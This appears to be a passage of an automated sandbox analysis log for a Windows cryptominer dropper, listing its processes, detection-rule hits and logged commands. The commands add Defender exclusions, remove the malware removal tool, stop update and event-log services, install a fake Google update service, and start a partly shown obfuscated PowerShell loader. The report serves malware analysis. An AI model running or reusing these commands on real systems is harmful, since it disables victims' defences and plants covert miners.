          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD3469E078 NtUnmapViewOfSection,67_2_00007FFD3469E078
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD346A0A3E NtUnmapViewOfSection,67_2_00007FFD346A0A3E
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B082990 NtEnumerateValueKey,NtEnumerateValueKey,70_2_000001D15B082990
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\xptjtnajcbas.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_s1u0d5sj.rn0.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467DD6829_2_00007FFD3467DD68
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467B3FB29_2_00007FFD3467B3FB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467C49829_2_00007FFD3467C498
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD34673E4529_2_00007FFD34673E45
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467C9FB29_2_00007FFD3467C9FB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD346716BF29_2_00007FFD346716BF
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467E33929_2_00007FFD3467E339
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD346736F129_2_00007FFD346736F1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD346716FA29_2_00007FFD346716FA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467BFF229_2_00007FFD3467BFF2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3474000129_2_00007FFD34740001
          Source: C:\Windows\System32\conhost.exeCode function: 32_3_000001D29E891FF432_3_000001D29E891FF4
          Source: C:\Windows\System32\conhost.exeCode function: 32_3_000001D29E8A3CD832_3_000001D29E8A3CD8
          Source: C:\Windows\System32\conhost.exeCode function: 32_3_000001D29E89D51032_3_000001D29E89D510
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8C2BF432_2_000001D29E8C2BF4
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8D48D832_2_000001D29E8D48D8
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8CE11032_2_000001D29E8CE110
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140001CF045_2_0000000140001CF0
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140002D5445_2_0000000140002D54
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_000000014000127445_2_0000000140001274
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_000000014000243445_2_0000000140002434
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_00000001400031D845_2_00000001400031D8
          Source: C:\Windows\System32\winlogon.exeCode function: 50_3_000002D016581FF450_3_000002D016581FF4
          Source: C:\Windows\System32\winlogon.exeCode function: 50_3_000002D01658D51050_3_000002D01658D510
          Source: C:\Windows\System32\winlogon.exeCode function: 50_3_000002D016593CD850_3_000002D016593CD8
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165E2BF450_2_000002D0165E2BF4
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165EE11050_2_000002D0165EE110
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165F48D850_2_000002D0165F48D8
          Source: C:\Windows\System32\lsass.exeCode function: 64_3_000002D6F14F3CD864_3_000002D6F14F3CD8
          Source: C:\Windows\System32\lsass.exeCode function: 64_3_000002D6F14ED51064_3_000002D6F14ED510
          Source: C:\Windows\System32\lsass.exeCode function: 64_3_000002D6F14E1FF464_3_000002D6F14E1FF4
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F15248D864_2_000002D6F15248D8
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F151E11064_2_000002D6F151E110
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F1512BF464_2_000002D6F1512BF4
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_000000014000325065_2_0000000140003250
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001400027D065_2_00000001400027D0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD3469DD5867_2_00007FFD3469DD58
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD34699F4D67_2_00007FFD34699F4D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD34696CC567_2_00007FFD34696CC5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD34693E4167_2_00007FFD34693E41
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD3469E32967_2_00007FFD3469E329
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD3469DBC567_2_00007FFD3469DBC5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD3469DC3167_2_00007FFD3469DC31
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD349168F367_2_00007FFD349168F3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD349151D267_2_00007FFD349151D2
          Source: C:\Windows\System32\conhost.exeCode function: 68_3_00000146F6AD1FF468_3_00000146F6AD1FF4
          Source: C:\Windows\System32\conhost.exeCode function: 68_3_00000146F6ADD51068_3_00000146F6ADD510
          Source: C:\Windows\System32\conhost.exeCode function: 68_3_00000146F6AE3CD868_3_00000146F6AE3CD8
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B02BF468_2_00000146F6B02BF4
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B0E11068_2_00000146F6B0E110
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B148D868_2_00000146F6B148D8
          Source: C:\Windows\System32\svchost.exeCode function: 69_3_0000014E41FAD51069_3_0000014E41FAD510
          Source: C:\Windows\System32\svchost.exeCode function: 69_3_0000014E41FB3CD869_3_0000014E41FB3CD8
          Source: C:\Windows\System32\svchost.exeCode function: 69_3_0000014E41FA1FF469_3_0000014E41FA1FF4
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FDE11069_2_0000014E41FDE110
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FE48D869_2_0000014E41FE48D8
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FD2BF469_2_0000014E41FD2BF4
          Source: C:\Windows\System32\dwm.exeCode function: 70_3_000001D15B063CD870_3_000001D15B063CD8
          Source: C:\Windows\System32\dwm.exeCode function: 70_3_000001D15B05D51070_3_000001D15B05D510
          Source: C:\Windows\System32\dwm.exeCode function: 70_3_000001D15B051FF470_3_000001D15B051FF4
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B0948D870_2_000001D15B0948D8
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B08E11070_2_000001D15B08E110
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B082BF470_2_000001D15B082BF4
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\xptjtnajcbas.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: egFMhHSlmf.exeStatic PE information: invalid certificate
          Source: unknownProcess created: Commandline size = 5379
          Source: unknownProcess created: Commandline size = 5435
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@97/17@5/5
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,45_2_0000000140002D54
          Source: C:\Windows\System32\dialer.exeCode function: 26_2_0000000140001614 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,26_2_0000000140001614
          Source: C:\Windows\System32\dialer.exeCode function: 26_2_0000000140001984 FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,26_2_0000000140001984
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1408:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7052:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2812:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5980:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5372:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2884:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5696:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4188:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5360:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5724:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2436:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3084:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3220:120:WilError_03
          Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\aymhdakqytvceiwv
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neubzoxx.u5e.ps1Jump to behavior
          Source: egFMhHSlmf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: egFMhHSlmf.exeReversingLabs: Detection: 73%
          Source: egFMhHSlmf.exeVirustotal: Detection: 75%
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile read: C:\Users\user\Desktop\egFMhHSlmf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\egFMhHSlmf.exe "C:\Users\user\Desktop\egFMhHSlmf.exe"
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMw
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
